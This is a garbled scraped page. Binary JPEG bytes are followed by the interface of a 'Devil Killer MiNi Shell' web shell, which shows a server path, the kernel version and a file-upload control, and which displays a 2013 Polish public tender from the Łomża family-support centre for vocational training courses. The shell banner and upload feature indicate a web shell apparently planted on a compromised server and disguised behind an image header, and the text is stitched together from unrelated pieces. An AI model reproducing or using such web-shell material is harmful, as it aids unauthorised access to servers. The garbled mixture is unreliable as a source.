JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130719/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130719/148521-N-2013.html

<p class="kh_header"><b>Łomża: Zorganizowanie i przeprowadzenie  kursów zawodowych dla uczestników projektu pn. Razem ku samodzielności-Integracja społeczna i zawodowa osób zagrożonych wykluczeniem społecznym osoby niepełnosprawne, bezrobotne, nieaktywne zawodowo, wychowankowie placówek opiekuńczo-wychowawczych, opiekunowie dzieci niepełnosprawnych w ramach Poddziałania 7.1.2 Działanie 7.1 Priorytet VII Programu Operacyjnego Kapitał Ludzki</b><br>
<b>Numer ogłoszenia: 148521 - 2013; data zamieszczenia: 19.07.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiatowe Centrum Pomocy Rodzinie w Łomży , ul. Szosa Zambrowska 1/27, 18-400 Łomża, woj. podlaskie, tel. (086) 215 69 42, faks (086) 215 69 70.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.pcpr.powiatlomzynski.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zorganizowanie i przeprowadzenie  kursów zawodowych dla uczestników projektu pn. Razem ku samodzielności-Integracja społeczna i zawodowa osób zagrożonych wykluczeniem społecznym osoby niepełnosprawne, bezrobotne, nieaktywne zawodowo, wychowankowie placówek opiekuńczo-wychowawczych, opiekunowie dzieci niepełnosprawnych w ramach Poddziałania 7.1.2 Działanie 7.1 Priorytet VII Programu Operacyjnego Kapitał Ludzki.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest usługa polegająca na zorganizowaniu i przeprowadzeniu  kursów uczestników projektu Razem ku samodzielności osoby niepełnosprawne, bezrobotne, nieaktywne zawodowo, wychowankowie placówek opiekuńczo wychowawczych, opiekunowie dzieci niepełnosprawnych.   kursów zawodowych wyszczególnionych w poniższej

CZĘŚĆ ZAMÓWIENIA: I

1.        Kurs spawania metodą MAG
Liczba osób: 8
Termin realizacji usługi: od 12 VIII do 30.IX. 2013
2.	Kurs spawania metodą TIG
Liczba osób: 2
Termin realizacji usługi: od 12 VIII do 30.IX. 2013

CZĘŚĆ ZAMÓWIENIA: II

1.	Kasa fiskalna z obsługa terminali i kart płatniczych
Liczba osób: 7
Termin realizacji usługi: sierpień 2013
2.	Kurs gastronomiczny - moduł I
Liczba osób: 5
Termin realizacji usługi: od 7 do 20 VIII 2013
3.	Kurs gastronomiczny - moduł II
Liczba osób: 2
Termin realizacji usługi: od 21 VIII do 31 VIII 2013
4.	Kelner - barman
Liczba osób: 5
Termin realizacji usługi: sierpień 2013

CZĘŚĆ ZAMÓWIENIA: III

1.	Kurs opiekuna osób zależnych opiekun osób starszych,chorych, niepełnosprawnych, opiekunka dziecięca, opiekun środowiskowy
Liczba osób: 10
Termin realizacji usługi: od 7 VIII do 22 VIII 2013 oraz od 2-10 IX 2013

CZĘŚĆ ZAMÓWIENIA: IV

1.	Kurs kosmetyczny
Liczba osób: 4
Termin realizacji usługi: od 7 VIII do 23 VIII 2013

CZĘŚĆ ZAMÓWIENIA: V

1.	Obsługa kasy fiskalnej oraz terminali kart płatniczych
Liczba osób: 22
Termin realizacji usługi: 	I grupa (8, 9, 12 VIII 2013) - 12 osób
				II grupa ( 3,4,5,6 IX 2013) - 10 osób
2.	Sprzedawca + fakturowanie
Liczba osób: 8
Termin realizacji usługi: od 19 do 29 VIII 2013

CZĘŚĆ ZAMÓWIENIA: VI

1.	Podstawy obsługi komputera i Internetu dla osoby niewidomej
Liczba osób: 1
Termin realizacji usługi: 7,8,9,12,13 VIII 2013

Zamawiający zastrzega sobie prawo zmniejszenia liczby osób skierowanych na szkolenie w przypadku, gdy wystąpi okoliczność, że zbędnym, niemożliwym lub koniecznym stanie się przeprowadzenie szkolenia dla mniejszej liczby osób niż wskazano
Miejsce i termin realizacji zamówienia realizacji poszczególnych kursów zostały sprecyzowane i znajdują się w Załączniku nr 6 SIWZ- SZCZEGÓŁOWY OPIS PRZEDMIOTU ZAMÓWIENIA. 
Z uwagi na fakt, iż część uczestników projektu uczestniczy w różnych formach wsparcia, a często realizują więcej niż 1 kurs  Wykonawca składający ofertę musi uwzględnić podany w załączniku nr 6 sposób organizacji szkolenia.


WYMAGANIA STAWIANE WYKONAWCOM:
1.	Oferent powinien posiadać zgodę na realizację szkoleń w  danym zakresie, a program i czas trwania  szkolenia  musi być zgodny z  obowiązującymi w tym zakresie przepisami prawa wytycznymi.
2.	Wykonawca ma obowiązek zapewnienia sal dydaktycznych, specjalistycznych pracowni wyposażonych w niezbędny sprzęt i urządzenia zapewniające bezpieczne szkolenie oraz przygotowanie do egzaminu.
3.	W przypadku konieczności wynikającej z przepisów BHP Wykonawca jest zobowiązany do zapewnienia uczestnikom kursu osprzętu i odzieży ochronnej.
4.	Wykonawca jest zobowiązany do sfinansowania kosztów przeprowadzenia niezbędnych badań lekarskich (przeprowadzonych przez lekarza medycyny pracy mających na celu stwierdzenie zdolności do odbycia kursu oraz podjęcia zatrudnienia zgodnego z kierunkiem szkolenia) - dotyczy części zamówienia nr I . Koszt należy uwzględnić w ogólnej cenie kursu. 
5.	Wykonawca ma obowiązek zapewnić wszystkie materiały dydaktyczne niezbędne do realizacji szkolenia. Materiały te należy uwzględnić w kalkulacji kosztów szkolenia. Każdy uczestnik szkolenia musi otrzymać na własność: komplet materiałów szkoleniowych, program szkolenia, harmonogram zajęć.
6.	Uczestnicy podczas szkolenia będą mieli bezpieczne i higieniczne warunki nauki, swobodny dostęp do pomieszczeń sanitarnych i niezbędnych środków czystości. 
7.	Uczestnikom szkolenia każdego dnia należy zapewnić catering, w skład którego ma wejść: kawa, herbata, woda mineralna, ciastka kruche lub sztukowe różnego rodzaju, kanapki. 
8.	Wykonawca ma obowiązek ubezpieczyć uczestników szkoleń od następstw nieszczęśliwych wypadków i dostarczyć kserokopię zawartej polisy ubezpieczeniowej do Zamawiającego. Koszt ubezpieczenia NNW należy ująć w cenie.
9.	Wszystkie dokumenty dotyczące realizacji przedmiotowych działań będą zawierały informację o współfinansowaniu projektu ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego oraz aktualne logotypy, zgodnie z wytycznymi dotyczącymi oznaczania projektów w ramach Programu Operacyjnego Kapitał Ludzki.
10.	Budynek i sale szkoleniowe muszą być oznakowane informacją o nazwie szkolenia, czasie trwania kursu, numerze sali, w której odbywają się zajęcia musza też zawierać logotypy POKL, EFS oraz informacje o realizowanym projekcie.
11.	Każdy kurs niekończący się egzaminem państwowym musi kończyć się egzaminem przed komisją powołaną przez organizatora szkolenia i wydaniem zaświadczenia potwierdzającego posiadanie kwalifikacji zawodowych zgodne z załącznikiem nr 2 do rozporządzenia Ministra Edukacji i Nauki z dnia 3 lutego 2006 r. w sprawie uzyskania i uzupełniania przez osoby dorosłe wiedzy ogólnej, umiejętności i kwalifikacji zawodowych w formach pozaszkolnych Dz. U. z 2006 r. Nr 31 poz. 216.
12. Po zakończeniu każdego kursu uczestnik otrzyma 2 zaświadczenia:
a.	zaświadczenie, które w treści musi zawierać w szczególności: dane osobowe uczestnika - absolwenta kursu z datą i miejscem urodzenia, nazwę organizatora kursu, termin realizacji kursu, cel kursu, miejscowość i datę wydania zaświadczenia, podpis i pieczęć Wykonawcy uprawnionego do wydania zaświadczenia, nazwę zajęć edukacyjnych i wymiar godzin zajęć praktycznych oraz teoretycznych w zakresie poszczególnych modułów kursu
b.	zaświadczenie zawierające dane wymienione w pkt. a wraz z umieszczonymi oznaczeniami Unii Europejskiej Europejski Fundusz Społeczny i Programu Operacyjnego Kapitał Ludzki oraz adnotacja: Projekt Razem ku samodzielności Integracja społeczna i zawodowa osób zagrożonych wykluczeniem społecznym współfinansowany przez Unię Europejską ze środków Europejskiego Funduszu Społecznego 

13.	Wykonawca sporządzi protokół z egzaminu kończącego kurs
14.	Wykonawca zobowiązuje się do archiwizacji dokumentów dotyczących przebiegu działań edukacyjnych, motywacyjnych i doradczych do 31.12.2020 r.
15.	Ponadto wyłoniony wykonawca będzie zobowiązany do: 
Tydzień po rozpoczęciu kursu Jednostka Szkoleniowa zobowiązana jest dostarczyć do Powiatowego Centrum Pomocy w Rodzinie w Łomży potwierdzone za zgodność z oryginałem kopie zaświadczeń o przeprowadzeniu badań lekarskich w przypadku kursów, w których warunkiem uczestnictwa jest pozytywny wynik badań. 
Po zakończeniu kursu Jednostka Szkoleniowa zobowiązana jest dostarczyć do Powiatowego Centrum Pomocy w Rodzinie w Łomży potwierdzone za zgodność z oryginałem: 
kserokopię dziennika zajęć edukacyjnych zawierającego tematy zajęć edukacyjnych i wymiar godzin oraz listę obecności z własnoręcznymi, czytelnymi  podpisami uczestników kursu mogą stanowić one załącznik do dziennika zajęć,
potwierdzenie odbioru materiałów szkoleniowych
kserokopie zaświadczeń lub innych dokumentów potwierdzających ukończenie kursu i uzyskanie kwalifikacji, 
kserokopię rejestru wydanych zaświadczeń lub innych dokumentów potwierdzających ukończenie kursu i uzyskanie kwalifikacji,
imienny wykaz osób, które nie ukończyły kursu, 
kserokopię protokołu egzaminacyjnego
komplet materiałów dydaktycznych
materiały zdjęciowe  z zajęć teoretycznych i praktycznych z każdego z realizowanych kursów  w tym zdjęcia grupowe wszystkich uczestników danego kursu.
ankiety ewaluacyjne
sprawozdanie z przeprowadzonego kursu 

Oferty częściowe: Zamawiający dopuszcza składanie ofert częściowych. Liczba części  6
Oferty wariantowe: Zamawiający nie dopuszcza składania ofert wariantowych.

Szczegółowy opis przedmiotu zamówienia zawiera załącznik nr 6 SIWZ.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 6.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 2.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie wykonawcy</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonali w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym czasie co najmniej jedną usługę polegającą na zorganizowaniu i przeprowadzeniu kursu zawodowego zgodnego z przedmiotem zamówienia, na który składana jest oferta.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie wykonawcy</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie wykonawcy</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Są ubezpieczeni od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia, co najmniej na kwotę 50.000 złotych.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">określenie dostaw lub usług, których dotyczy obowiązek wskazania przez wykonawcę w wykazie lub złożenia poświadczeń, w tym informacja o dostawach lub usługach niewykonanych lub wykonanych nienależycie<br>co najmniej jedną usługę polegającą na zorganizowaniu i przeprowadzeniu kursu zawodowego zgodnego z przedmiotem zamówienia, na który składana jest oferta.;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Do oferty należy załączyć harmonogram kursu</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zmiana ilości uczestników kursu - rezygnacja, usunięcie itp</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.pcpr.powiatlomzynski.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Powiatowe Centrum Pomocy Rodzinie w Łomży 18-400 Łomża, ul. Szosa Zambrowska 1/27.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 26.07.2013 godzina 10:00, miejsce: Powiatowe Centrum Pomocy Rodzinie w Łomży 18-400 Łomża, ul. Szosa Zambrowska 1/27 - w sekretariacie..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Program Operacyjny Kapitał Ludzki.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Kurs spawania metodą MAG (135) i  TIG (141).</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Kurs spawania metodą MAG (135)
LICZBA  UCZESTNIKÓW: 8
TERMIN  REALIZACJI USŁUGI : od 12 sierpnia  do  30 września  2013
MIEJSCE REALIZACJI USŁUGI:  miasto Łomża
CEL SZKOLENIA: uzyskanie uprawnień spawalniczych w zakresie spawania blach i rur spoinami pachwinowymi metodą MAG-135 
ORGANIZACJA SZKOLENIA: istotnym warunkiem zamówienia jest przeprowadzenie zajęć tak, aby mogły w nich uczestniczyć osoby uczące się tj. w miesiącu sierpniu przynajmniej 5 dni w tygodniu, (można uwzględnić soboty) w godz. od 8 do 16, w miesiącu wrześniu w systemie popołudniowym (po godz. 14)

2.	Kurs spawania metodą TIG (141)
LICZBA UCZESTNIKÓW: 2
TERMIN  REALIZACJI USŁUGI : od 12 sierpnia  do  30 września  2013
MIEJSCE REALIZACJI USŁUGI:  miasto Łomża
CEL SZKOLENIA: uzyskanie uprawnień spawalniczych w zakresie spawania blach i rur spoinami pachwinowymi metodą TIG-141.
ORGANIZACJA SZKOLENIA: istotnym warunkiem zamówienia jest przeprowadzenie zajęć tak, aby mogły w nich uczestniczyć osoby uczące się tj. w miesiącu sierpniu przynajmniej 5 dni w tygodniu  (można uwzględnić soboty) w godz. od 8 do 16, w miesiącu wrześniu w systemie popołudniowym (po godz. 14)


WYMAGANIA DODATKOWE:

Program szkolenia z zakresu spawania musi być zgodny z wytycznymi Instytutu Spawalnictwa 
Wykonawca skieruje każdego z uczestników projektu na obowiązkowe badania lekarskie uprawniające do uczestnictwa w kursie
Baza szkoleniowa do przeprowadzenia zajęć znajdująca się na terenie Miasta Łomża w szczególności musi być zgodna
z wymaganiami instytucji uprawnionych do wydawania atestów/certyfikatów  na prowadzenie szkoleń i egzaminów spawaczy, uzyskanych na podstawie wymagań instytucji podległych Ministrowi Gospodarki lub innemu właściwemu,
z Rozporządzeniem Ministra Gospodarki z 27.04.2000 w sprawie bezpieczeństwa i higieny pracy przy pracach spawalniczych (Dz.U. z 2000 r., Nr 40, poz.470).

Kurs będzie kończyć się egzaminem zewnętrznym przeprowadzanym przez komisję powołaną przez Instytut Spawalnictwa w Gliwicach. zgodnie z Wytycznymi Instytutu Spawalnictwa w Gliwicach;
Oprócz certyfikatów kursanci otrzymają Książeczki Spawacza ze stosownym wpisem zgodnym z polską Normą wg wskazań Instytutu Spawalnictwa w Gliwicach oraz Euro świadectwem w języku polskim i angielskim ze stosownym wpisem do książeczki Spawacza przedstawiciela PRS..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 2.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> 1.	Kasa fiskalna z obsługa terminali i kart płatniczych
Liczba osób: 7
Termin realizacji usługi: sierpień 2013
2.	Kurs gastronomiczny - moduł I
Liczba osób: 5
Termin realizacji usługi: od 7 do 20 VIII 2013
3.	Kurs gastronomiczny - moduł II
Liczba osób: 2
Termin realizacji usługi: od 21 VIII do 31 VIII 2013
4.	Kelner - barman
Liczba osób: 5
Termin realizacji usługi: sierpień 2013.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Obsługa kasy fiskalnej+ terminali kart płatniczych

LICZBA UCZESTNIKÓW:  7
TERMIN  REALIZACJI USŁUGI : sierpień 2013
MIEJSCE REALIZACJI USŁUGI:  miasto Łomża 
CEL SZKOLENIA: nabycie praktycznych umiejętności posługiwania się kasą fiskalną i terminalami kart płatniczych
